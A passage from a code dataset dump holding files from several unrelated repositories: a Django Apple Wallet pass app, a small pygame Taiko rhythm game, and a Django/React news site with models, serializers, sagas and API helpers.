"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.4 on 2017-08-08 00:10\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Log',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('message', models.TextField()),\n ],\n ),\n migrations.CreateModel(\n name='Pass',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('pass_type_identifier', models.CharField(max_length=255)),\n ('serial_number', models.CharField(max_length=255)),\n ('authentication_token', models.CharField(max_length=255)),\n ('data', models.FileField(upload_to='passes')),\n ('updated_at', models.DateTimeField()),\n ],\n ),\n migrations.CreateModel(\n name='Registration',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('device_library_identifier', models.CharField(max_length=64)),\n ('push_token', models.CharField(max_length=64)),\n ('pazz', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='django_passbook.Pass')),\n ],\n ),\n migrations.AlterUniqueTogether(\n name='pass',\n unique_together=set([('pass_type_identifier', 'serial_number')]),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6969407200813293,
"alphanum_fraction": 0.6978967785835266,
"avg_line_length": 28.885713577270508,
"blob_id": "6c6a7f6e6e2cd2dfc4d9605e632d1fae8ac12f6c",
"content_id": "de53a176e92e87d16f945adf756c120e85558a8d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1046,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 35,
"path": "/django_passbook/admin.py",
"repo_name": "mr-love/django-passbook",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom django_passbook.models import Pass, Registration, Log\nfrom django_passbook import settings\nfrom apns3 import APNs, Payload\n\n\ndef push_update(modeladmin, request, queryset):\n for r in queryset.all():\n # FIXME: use different certificates for different stores\n apns = APNs(use_sandbox=False,\n cert_file=settings.PASSBOOK_CERT,\n key_file=settings.PASSBOOK_CERT_KEY)\n apns.gateway_server.send_notification(r.push_token, Payload())\n\n\npush_update.short_description = \"Send a push notification to update Pass\"\n\n\[email protected](Registration)\nclass RegistrationAdmin(admin.ModelAdmin):\n list_display = ('device_library_identifier', 'push_token', 'pazz')\n actions = [push_update]\n\n\[email protected](Pass)\nclass PassAdmin(admin.ModelAdmin):\n list_display = (\n 'serial_number', 'pass_type_identifier', 'authentication_token',\n 'updated_at',\n )\n\n\[email protected](Log)\nclass LogAdmin(admin.ModelAdmin):\n list_display = ('message',)\n"
},
{
"alpha_fraction": 0.7368420958518982,
"alphanum_fraction": 0.7368420958518982,
"avg_line_length": 37,
"blob_id": "9d9cc9ae708e801e3235ef813fc41d187a0a4fd3",
"content_id": "6adf1ea4326911d5e2b61c2c4486978d88804547",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 152,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 4,
"path": "/django_passbook/settings.py",
"repo_name": "mr-love/django-passbook",
"src_encoding": "UTF-8",
"text": "from django.conf import settings\n\nPASSBOOK_CERT = getattr(settings, 'PASSBOOK_CERT', '')\nPASSBOOK_CERT_KEY = getattr(settings, 'PASSBOOK_CERT_KEY', '')\n"
}
] | 5 |
hibikidesu/Taiko
|
https://github.com/hibikidesu/Taiko
|
325ac9eb6322a78c9881228b940f6f856da6ef5c
|
7d8681fe9b13dc4c51b949998d890e4c3bfdb537
|
7ddd6a31340f6f36c350cd5291d243493f11ff3c
|
refs/heads/master
| 2020-05-21T07:26:45.382868 | 2019-05-10T10:09:56 | 2019-05-10T10:09:56 | 185,961,116 | 3 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5186799764633179,
"alphanum_fraction": 0.5305106043815613,
"avg_line_length": 28.200000762939453,
"blob_id": "e4aef4c4a9b138bde82ab303490c7358b1bffd28",
"content_id": "e7e30bf8a7b8f814450b40ba2596fd06f526160b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1606,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 55,
"path": "/taiko/game.py",
"repo_name": "hibikidesu/Taiko",
"src_encoding": "UTF-8",
"text": "import pygame\nimport os\nfrom .taiko import Taiko\nfrom .songselect import SongSelect\n\n\nclass Game:\n\n def __init__(self, song_path: str = \"taiko_songs\",\n *, taiko: Taiko = None, select: SongSelect = None, x: int = 1280, y: int = 720, framerate: int = 144):\n self.x = x\n self.y = y\n self.framerate = framerate\n\n self.screen = None\n self.clock = None\n self.running = False\n self.game_loaded = False\n self.state = 0\n self.songs = []\n\n self.taiko = taiko if taiko else Taiko(self)\n self.song_select = select if select else SongSelect(self)\n\n if not os.path.exists(song_path):\n os.mkdir(song_path)\n\n def run(self):\n pygame.mixer.pre_init(44100)\n pygame.init()\n self.screen = pygame.display.set_mode((self.x, self.y))\n pygame.display.set_caption(\"Taiko\")\n self.clock = pygame.time.Clock()\n\n self.running = True\n\n while self.running:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running = False\n\n if self.state == 0:\n if event.type == pygame.KEYDOWN:\n self.song_select.key_press(event.key)\n\n if not self.game_loaded and self.clock.get_fps() >= 1:\n self.game_loaded = True\n\n if self.game_loaded:\n if self.state == 0:\n self.song_select.update()\n else:\n self.taiko.update()\n self.clock.tick(self.framerate)\n"
},
{
"alpha_fraction": 0.6590909361839294,
"alphanum_fraction": 0.6590909361839294,
"avg_line_length": 21,
"blob_id": "d8552fe05ee5f5191cad5a565be327c1764d087f",
"content_id": "738718686c3088fb671077194babcf1be1184e4e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 132,
"license_type": "permissive",
"max_line_length": 41,
"num_lines": 6,
"path": "/taiko/__init__.py",
"repo_name": "hibikidesu/Taiko",
"src_encoding": "UTF-8",
"text": "from .taiko import *\nfrom .parser import *\nfrom .game import *\nfrom .songselect import *\n\n__all__ = [\"Taiko\", \"Game\", \"SongSelect\"]\n"
},
{
"alpha_fraction": 0.49757280945777893,
"alphanum_fraction": 0.5509708523750305,
"avg_line_length": 21.88888931274414,
"blob_id": "d4a069857b921b06155cfe4e136f16a6595fb343",
"content_id": "993abd6e86c2af3b2e0fc333464a91f056565617",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 412,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 18,
"path": "/taiko/taiko.py",
"repo_name": "hibikidesu/Taiko",
"src_encoding": "UTF-8",
"text": "import pygame\n\n\nclass Taiko:\n\n def __init__(self, game):\n self.game = game\n self.ms = 0\n self.__hit = [round(self.game.x / 4), round(self.game.y / 2)]\n\n def update(self):\n self.ms += round(1000 / self.game.clock.get_fps())\n\n self.game.screen.fill((255, 255, 255))\n\n pygame.draw.circle(self.game.screen, (0, 0, 0), self.__hit, 50, 0)\n\n pygame.display.flip()\n"
},
{
"alpha_fraction": 0.4545454680919647,
"alphanum_fraction": 0.4588744640350342,
"avg_line_length": 18.25,
"blob_id": "c6531bbdb12c462b2bee72c478194ab48df9e4c5",
"content_id": "b28e0e872ec20a77f524e74358b2a19e4f8d7020",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 231,
"license_type": "permissive",
"max_line_length": 40,
"num_lines": 12,
"path": "/taiko/parser.py",
"repo_name": "hibikidesu/Taiko",
"src_encoding": "UTF-8",
"text": "class Parser:\n\n def __init__(self, file):\n self.file = file\n\n self.name = \"\"\n self.author = \"\"\n self.bpm = 0\n\n def parse(self):\n with open(self.file, \"rb\") as f:\n file = f.read()\n"
},
{
"alpha_fraction": 0.515625,
"alphanum_fraction": 0.515625,
"avg_line_length": 15,
"blob_id": "b581979d9e8b355d4fc5813c3414bd77269e9902",
"content_id": "b265337edd422cce95349c60083cbf47ad3e928b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 64,
"license_type": "permissive",
"max_line_length": 26,
"num_lines": 4,
"path": "/app.py",
"repo_name": "hibikidesu/Taiko",
"src_encoding": "UTF-8",
"text": "import taiko\n\nif __name__ == \"__main__\":\n taiko.Game().run()\n"
},
{
"alpha_fraction": 0.4801980257034302,
"alphanum_fraction": 0.5297029614448547,
"avg_line_length": 23.239999771118164,
"blob_id": "823c96d5e5e3e47345e68d73cfc8f672ed3d7ad4",
"content_id": "642a1c6d5821239412c26f10669cd7fff67b02d5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 606,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 25,
"path": "/taiko/songselect.py",
"repo_name": "hibikidesu/Taiko",
"src_encoding": "UTF-8",
"text": "import pygame\n\n\nclass SongSelect:\n\n def __init__(self, game):\n self.game = game\n self.ms = 0\n\n self.curr_song = 0\n\n def key_press(self, key):\n if key not in [276, 275]:\n return\n self.curr_song += 1 if key == 276 else -1\n if self.curr_song <= -1:\n self.curr_song = len(self.game.songs) - 1\n elif self.curr_song > len(self.game.songs) - 1:\n self.curr_song = 0\n\n def update(self):\n self.ms += round(1000 / self.game.clock.get_fps())\n self.game.screen.fill((255, 255, 255))\n\n pygame.display.flip()\n"
}
] | 6 |
JuMoKan/BoardGameGeek
|
https://github.com/JuMoKan/BoardGameGeek
|
1f1d57e1d9deb7884ce12fcf5c85e936efeec880
|
8fe145a4eaf74ad645f9774d29cc001d212525a7
|
17dc836cd670173d338f696ef5c2f4082a3623e5
|
refs/heads/master
| 2023-02-01T16:32:45.433732 | 2019-02-27T08:52:59 | 2019-02-27T08:52:59 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6907216310501099,
"alphanum_fraction": 0.7172312140464783,
"avg_line_length": 25.038461685180664,
"blob_id": "1467dcfc874691ce0c74f899dd619b5774247626",
"content_id": "3d5df1cefd958f70c086c17bf2e07ff29ecc9fab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 679,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 26,
"path": "/API_Test.py",
"repo_name": "JuMoKan/BoardGameGeek",
"src_encoding": "UTF-8",
"text": "\n###Anzahl und Liste der gespielten Liste\nfrom boardgamegeek import BGGClient\nbgg = BGGClient()\n\nplays = bgg.plays(name=\"schrobe\")\nprint(\"Anzahl gespielter Spiele: %d\" % (len(plays)))\n\nl_games_played = []\n\nfor session in plays._plays:\n l_games_played.append(session.game_name)\n\t\n\t\n###Top 100 Liste, webscraped\nfrom urllib2 import urlopen\nfrom bs4 import BeautifulSoup\nquote_page = 'https://www.boardgamegeek.com/browse/boardgame'\n\npage = urlopen(quote_page)\nsoup = BeautifulSoup(page, 'html.parser')\n#print(soup)\n\ngames_top_100 = []\nfor i in range(1,100):\n games_top_100.append(soup.find('div', attrs={'id': 'results_objectname'+str(i)}).get_text())\nprint(games_top_100)\n\n"
},
{
"alpha_fraction": 0.7666666507720947,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 11.199999809265137,
"blob_id": "4c572d988664aad6400e500286f732390ef7e2c2",
"content_id": "06fa898f657c87a4285192266c7b2cd08b64f924",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 60,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 5,
"path": "/readme.txt",
"repo_name": "JuMoKan/BoardGameGeek",
"src_encoding": "UTF-8",
"text": "boardgamegeek.com API\n\n# Dependencies\n- bs4\n- boardgamegeek2"
}
] | 2 |
Faramita2/superlists
|
https://github.com/Faramita2/superlists
|
e6c8521e23db2b3afd21819de99644e216830448
|
6784200a7706470ef6acf72700eefd2f6d8c08c9
|
52b5031414913e54bd709a1b5793e89575be16ff
|
refs/heads/master
| 2021-08-22T21:32:08.560314 | 2019-06-15T12:05:39 | 2019-06-15T12:05:39 | 188,988,589 | 0 | 0 | null | 2019-05-28T08:36:52 | 2019-06-15T12:13:11 | 2021-06-10T21:33:48 |
JavaScript
|
[
{
"alpha_fraction": 0.6287144422531128,
"alphanum_fraction": 0.630903959274292,
"avg_line_length": 32.64210510253906,
"blob_id": "a2c8c910260f20b8b3f3d12ee32963c2a3da7bb4",
"content_id": "31a2d9ec144b4bc6892a661e973af8568c6d5561",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4021,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 95,
"path": "/functional_tests/test_simple_list_creation.py",
"repo_name": "Faramita2/superlists",
"src_encoding": "UTF-8",
"text": "from .base import FunctionalTest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\n\nclass NewVisitorTest(FunctionalTest):\n\n def test_can_start_a_list_and_retrieve_it_later(self):\n # 伊迪丝听说又一个很酷的在线待办事项应用\n # 她去看了这个应用的首页\n self.browser.get(self.live_server_url)\n\n # 她主要到网页的标题和头部都包含 \"To-Do\" 这个词\n self.assertIn('To-Do', self.browser.title)\n header_text = self.browser.find_element_by_tag_name('h1').text\n self.assertIn('To-Do', header_text)\n\n # 应用邀请她输入一个待办事项\n inputbox = self.get_item_input_box()\n self.assertEqual(\n inputbox.get_attribute('placeholder'),\n 'Enter a to-do item'\n )\n\n # 她在一个文本框中输入了 \"Buy peacock feathers\" (购买孔雀羽毛)\n # 伊迪丝的爱好是使用假蝇做饵钓鱼\n inputbox.send_keys('Buy peacock feathers')\n\n # 她按回车键后, 页面更新了\n # 待办事项表格中显示了 \"1: Buy peacock feathers\"\n inputbox.send_keys(Keys.ENTER)\n self.wait_for_row_in_list_table('1: Buy peacock feathers')\n\n # 页面中又显示了一个文本框, 可以输入其他的待办事项\n # 她输入了 \"Use peacock feathers to make a fly\" (使用孔雀羽毛做假蝇)\n # 伊迪丝做事很有理\n inputbox = self.get_item_input_box()\n inputbox.send_keys('Use peacock feathers to make a fly')\n inputbox.send_keys(Keys.ENTER)\n # 页面再次更新, 她的清单中显示了这两个待办事项\n self.wait_for_row_in_list_table('1: Buy peacock feathers')\n self.wait_for_row_in_list_table('2: Use peacock feathers to make a fly')\n\n # 伊迪丝想知道这个网站是否会记住她的清单\n # 她看到网站为她生成了唯一的URL\n # 而且页面中有一些文字解说了这个功能\n\n # 她访问那个URL, 发现她的待办事项列表还在\n\n # 她很满意, 去睡觉了\n\n def test_multiple_users_can_start_lists_at_different_urls(self):\n # 伊迪丝新建一个待办事项清单\n self.browser.get(self.live_server_url)\n inputbox = self.get_item_input_box()\n inputbox.send_keys('Buy peacock feathers')\n inputbox.send_keys(Keys.ENTER)\n self.wait_for_row_in_list_table('1: Buy peacock feathers')\n\n # 她注意到清单有个唯一的URL\n edith_list_url = self.browser.current_url\n self.assertRegex(edith_list_url, '/lists/.+')\n\n # 现在一名叫做弗朗西斯的新用户访问了网站\n\n ## 我们使用一个新浏览器会话\n ## 确保伊迪丝的信息不会从cookie中泄露出去\n self.browser.quit()\n self.browser = webdriver.Chrome(self.chrome_driver_binary)\n\n # 弗朗西斯访问首页\n # 页面中看不到伊迪丝的清单\n self.browser.get(self.live_server_url)\n page_text = self.browser.find_element_by_tag_name('body').text\n self.assertNotIn('Buy peacock feathers', page_text)\n self.assertNotIn('make a fly', page_text)\n\n # 弗朗西斯输入了一个新待办事项, 新建一个清单\n # 他不像伊迪丝那么兴趣盎然\n inputbox = self.get_item_input_box()\n inputbox.send_keys('Buy milk')\n inputbox.send_keys(Keys.ENTER)\n self.wait_for_row_in_list_table('1: Buy milk')\n\n # 弗朗西斯获得了他的唯一URL\n francis_list_url = self.browser.current_url\n self.assertRegex(francis_list_url, '/lists/.+')\n self.assertNotEqual(francis_list_url, edith_list_url)\n\n # 这个页面还是没有伊迪丝的清单\n page_text = self.browser.find_element_by_tag_name('body').text\n self.assertNotIn('Buy peacock feathers', page_text)\n self.assertIn('Buy milk', page_text)\n\n # 两人都很满意, 一起睡觉了\n\n"
},
{
"alpha_fraction": 0.4406779706478119,
"alphanum_fraction": 0.6892655491828918,
"avg_line_length": 15.090909004211426,
"blob_id": "534a1d45e984f03cd7251ceeadf003a5964377ba",
"content_id": "5b366dd6d61f98c9a9fd643005db97139c6de1e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 177,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 11,
"path": "/requirements.txt",
"repo_name": "Faramita2/superlists",
"src_encoding": "UTF-8",
"text": "cycler==0.10.0\nDjango==1.11.20\ngunicorn==19.9.0\nkiwisolver==1.1.0\nnose==1.3.7\npyparsing==2.4.0\npython-dateutil==2.8.0\npytz==2019.1\nselenium==3.141.0\nsix==1.12.0\nurllib3==1.25.3\n"
},
{
"alpha_fraction": 0.6108786463737488,
"alphanum_fraction": 0.6317991614341736,
"avg_line_length": 15.448275566101074,
"blob_id": "573e17582ce80d0588af5850e04c4bef718fd3f8",
"content_id": "d9dac4521e595e3bccda0276fbecabbeb8a50683",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 634,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 29,
"path": "/deploy_tools/provisioning_notes.md",
"repo_name": "Faramita2/superlists",
"src_encoding": "UTF-8",
"text": "配置新网站\n================\n## 需要的包: \n* nginx\n* Python 3.7\n* virtualenv + pip\n* Git\n\n以Ubuntu 19.04为例: \n sudo apt-get install nginx git python37 python3.7-venv\n\n## Nginx虚拟主机\n* 参考nginx.teamplate.conf\n* 把SITENAME替换成所需的域名, 例如lgzzzz.com\n\n## Systemd服务\n* 参考gunicorn-upstart.template.conf\n* 把SITENAME替换成所需的域名, 例如lgzzzz.com\n\n## 文件夹结构\n假设有用户账户, 家目录为/home/username\n\n/home/username\n└── sites\n └── SITENAME \n ├── database\n ├── source\n ├── static\n └── virtualenv\n\n"
}
] | 3 |
seemamir/braid
|
https://github.com/seemamir/braid
|
b1d15a88ddadd3faff39df375c26d27252078309
|
d47d662bf2bb8d96585edcf981d881411aa20443
|
71ab91f34fbfb0adb5db6e1a8fb2cbf1e77ff439
|
refs/heads/master
| 2020-04-08T02:44:32.333963 | 2018-11-28T21:51:55 | 2018-11-28T21:51:55 | 158,947,063 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6790017485618591,
"alphanum_fraction": 0.6798623204231262,
"avg_line_length": 28.794872283935547,
"blob_id": "e0aa5f5958e5524983d0a8c681188e4a416ad1de",
"content_id": "37fecb9ea7575c74a45cdafad5f31d830eb2a288",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1162,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 39,
"path": "/app/containers/NewsPage/saga.js",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "import { takeLatest, call, put, cancel, take } from 'redux-saga/effects';\nimport { get } from 'lodash';\nimport * as api from './api';\nimport * as a from './actions';\nimport * as c from './constants';\nexport function* index(action) {\n try {\n const { id } = action;\n const response = yield call(api.fectSavedPosts, id);\n yield put(a.setPosts(response.data));\n } catch (error) {}\n}\n\nexport function* updateProfile(action) {\n try {\n const res = yield call(api.updateProfile, action.payload);\n console.log(res);\n } catch (e) {\n console.log(e.message);\n }\n}\n// Individual exports for testing\nexport function* fetchProfile(action) {\n try {\n console.log(action);\n const response = yield call(api.fetchProfile, action.payload);\n console.log(response.data);\n yield put(a.setProfile(get(response, 'data[0]', {})));\n } catch (e) {\n console.log(e.message);\n }\n}\n// Individual exports for testing\nexport default function* newsPageSaga() {\n // See example in containers/HomePage/saga.js\n yield takeLatest(c.FETCH_POSTS, index);\n yield takeLatest(c.UPDATE_PROFILE, updateProfile);\n yield takeLatest(c.FETCH_PROFILE, fetchProfile);\n}\n"
},
{
"alpha_fraction": 0.6796116232872009,
"alphanum_fraction": 0.6796116232872009,
"avg_line_length": 50.5,
"blob_id": "57f4f302ca08fb1501a73155fa9dc726feec3ce5",
"content_id": "2847cd351a816101132b3fa7f17e125b1c9d1a6e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 618,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 12,
"path": "/app/containers/ViewNews/api.js",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "import axios from '../../utils/http';\n\nexport const viewPostApi = id => axios.get(`/api/post/${id}/`);\nexport const updatePostApi = (id, payload) => {\n console.log(id, payload);\n return axios.post(`/api/post/${id}/`, payload);\n};\nexport const comment = data => axios.post(`/api/comment/`, data);\nexport const commentsApi = id => axios.get(`/api/comment/?post=${id}`);\nexport const setPostReaction = data => axios.post(`/api/post-reaction/`, data);\nexport const getPostReactions = postID => axios.get(`/api/post-reaction/?post=${postID}`);\nexport const saveAsSavedPost = data => axios.post(`/api/saved-post/`, data);\n"
},
{
"alpha_fraction": 0.7039999961853027,
"alphanum_fraction": 0.7039999961853027,
"avg_line_length": 30.25,
"blob_id": "974bdde29537af4e3e76cfad459f967a34232738",
"content_id": "2a67ae0a5426327f43f3cb1e4aced741f9cfb7c8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 125,
"license_type": "permissive",
"max_line_length": 42,
"num_lines": 4,
"path": "/app/containers/Signup/api.js",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "import axios from '../../utils/http';\n\nexport const createAccountApi = payload =>\n axios.post('rest-auth/signup', payload);\n"
},
{
"alpha_fraction": 0.7242140173912048,
"alphanum_fraction": 0.7357970476150513,
"avg_line_length": 30.807018280029297,
"blob_id": "d4f8aff504589bb3c154ac686ce8dab79f06b0fc",
"content_id": "f8e86fcd32ee535ec75121110128a8f528ff2f41",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1813,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 57,
"path": "/jango/api/models.py",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nclass Post(models.Model):\n title = models.CharField(max_length=250)\n user = models.ForeignKey(User,on_delete=models.CASCADE)\n author = models.CharField(max_length=250)\n category = models.CharField(max_length=250)\n source = models.CharField(max_length=250)\n author_description = models.TextField(blank=True)\n main_sentence = models.TextField(blank=True)\n sentence2 = models.TextField(blank=True)\n sentence3 = models.TextField(blank=True)\n sentence4 = models.TextField(blank=True)\n people1 = models.TextField(blank=True)\n people2 = models.TextField(blank=True)\n people3 = models.TextField(blank=True)\n people4 = models.TextField(blank=True)\n \n embedded_image = models.TextField(blank=True)\n thumbnail_image = models.TextField(blank=True)\n\n def __str__(self):\n return self.title\n\n\nclass Profile(models.Model):\n user = models.ForeignKey(User,on_delete=models.CASCADE,unique=True)\n bio = models.TextField(blank=True)\n image = models.TextField(blank=True)\n \n def __str__(self):\n return \"Post reaction\"\n\nclass PostReaction(models.Model):\n post = models.ForeignKey('api.Post',on_delete=models.CASCADE)\n reaction_type = models.CharField(max_length=20)\n user = models.ForeignKey(User,on_delete=models.CASCADE)\n\n def __str__(self):\n return \"Post reaction\"\n\nclass SavedPost(models.Model):\n post = models.ForeignKey('api.Post',on_delete=models.CASCADE)\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n\n def __str__(self):\n return \"Saved post\"\n\nclass Comment(models.Model):\n post = models.ForeignKey('api.Post',on_delete=models.CASCADE)\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n comment = models.TextField()\n\n def __str__(self):\n return \"Saved post\"\n"
},
{
"alpha_fraction": 0.8354430198669434,
"alphanum_fraction": 0.8354430198669434,
"avg_line_length": 33,
"blob_id": "c5c2d8742b68006090b043db9aeeccad62471d01",
"content_id": "d39aa223b86014c10b97266533472dd28fc3128b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 237,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 7,
"path": "/jango/api/admin.py",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import Post,PostReaction,SavedPost,Profile\n# Register your models here.\nadmin.site.register(Post)\nadmin.site.register(PostReaction)\nadmin.site.register(SavedPost)\nadmin.site.register(Profile)"
},
{
"alpha_fraction": 0.681034505367279,
"alphanum_fraction": 0.681034505367279,
"avg_line_length": 37.66666793823242,
"blob_id": "0eed6edb4897ee03ed8b8f56d9aafe7598fa046a",
"content_id": "c22b8c101b5a2f657d48e424585c905064dfba32",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 116,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 3,
"path": "/app/containers/Login/api.js",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "import axios from '../../utils/http';\n\nexport const loginApi = payload => axios.post('/rest-auth/login/', payload);\n"
},
{
"alpha_fraction": 0.7064220309257507,
"alphanum_fraction": 0.7064220309257507,
"avg_line_length": 14.571428298950195,
"blob_id": "4cf5185e6971d0278bfbe23fad8dfc88aa68598c",
"content_id": "5a4068288a44644cea6eda04a143cc1d3d0f4b9b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 109,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 7,
"path": "/app/containers/ForgetPassword/constants.js",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "/*\n *\n * ForgetPassword constants\n *\n */\n\nexport const DEFAULT_ACTION = 'app/ForgetPassword/DEFAULT_ACTION';\n"
},
{
"alpha_fraction": 0.7085427045822144,
"alphanum_fraction": 0.7085427045822144,
"avg_line_length": 21.11111068725586,
"blob_id": "83bc24d046c416654955dae4ccc5df000a1700a6",
"content_id": "7951532e0378f5ac7b044f0350d6dfa2a5dbf916",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 199,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 9,
"path": "/app/containers/AddNews/constants.js",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "/*\n *\n * AddNews constants\n *\n */\n\nexport const DEFAULT_ACTION = 'app/AddNews/DEFAULT_ACTION';\nexport const ADD_POST = 'app/AddNews/ADD_POST';\nexport const SET_RESPONSE = 'app/AddNews/SET_RESPONSE';\n"
},
{
"alpha_fraction": 0.8050000071525574,
"alphanum_fraction": 0.8050000071525574,
"avg_line_length": 37.095237731933594,
"blob_id": "8d31e87805c260a4e418c22ae2ec397f5c2657ee",
"content_id": "adae0f1ddad5ae1bbfe8ea560f20ced199c2509e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 800,
"license_type": "permissive",
"max_line_length": 171,
"num_lines": 21,
"path": "/jango/api/urls.py",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url, include\nfrom django.urls import path\nfrom rest_framework import routers\nfrom .views import PostViewSet, PostReactionViewSet, SavedPostViewSet, Login, Signup, RequestPasswordResetToken, ResetPassword, UserViewSet, CommentViewSet, ProfileViewSet\nfrom django.conf.urls import url\n \nrouter = routers.DefaultRouter()\nrouter.register(r'post', PostViewSet)\nrouter.register(r'post-reaction', PostReactionViewSet)\nrouter.register(r'saved-post', SavedPostViewSet)\nrouter.register(r'user', UserViewSet)\nrouter.register(r'comment', CommentViewSet)\nrouter.register(r'user-profile', ProfileViewSet)\n\nurlpatterns = [\n url(r'', include(router.urls)),\n path('signup',Signup),\n path('resetPassword',ResetPassword),\n path('requestPasswordResetToken',RequestPasswordResetToken),\n\n]\n"
},
{
"alpha_fraction": 0.6731283664703369,
"alphanum_fraction": 0.6731283664703369,
"avg_line_length": 23.933332443237305,
"blob_id": "9e85e60614b8c90b152e467bcb39f1dda109ee14",
"content_id": "90febe617f6613728f1e7780fbc40a3a1274bd3f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1496,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 60,
"path": "/jango/api/serializers.py",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "from .models import Post,PostReaction,SavedPost, Comment, Profile\nfrom rest_framework import routers, serializers, viewsets\nfrom django.contrib.auth.models import User\n\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = \"__all__\"\n\nclass PostSerializer(serializers.ModelSerializer):\n class Meta:\n model = Post\n fields = \"__all__\"\n\nclass ProfileSerializer(serializers.ModelSerializer):\n class Meta:\n model = Profile\n fields = \"__all__\"\n\nclass PostReactionSerializer(serializers.ModelSerializer):\n # user = UserSerializer(many=False, read_only=False)\n class Meta:\n model = PostReaction\n fields = \"__all__\"\n\n\nclass SavedPostSerializer(serializers.ModelSerializer):\n # post = PostSerializer(many=False, read_only=False)\n \n class Meta:\n model = SavedPost\n fields = \"__all__\"\n\nclass CommentSerializer(serializers.ModelSerializer):\n # user = UserSerializer(many=False, read_only=False)\n class Meta:\n model = Comment\n fields = \"__all__\"\n\n\n # def create(self, validated_data):\n # user = User.objects.create(\n # username=validated_data['username'],\n # first_name=validated_data['first_name'],\n # last_name=validated_data['last_name'],\n # email=validated_data['email'],\n # )\n\n\n # 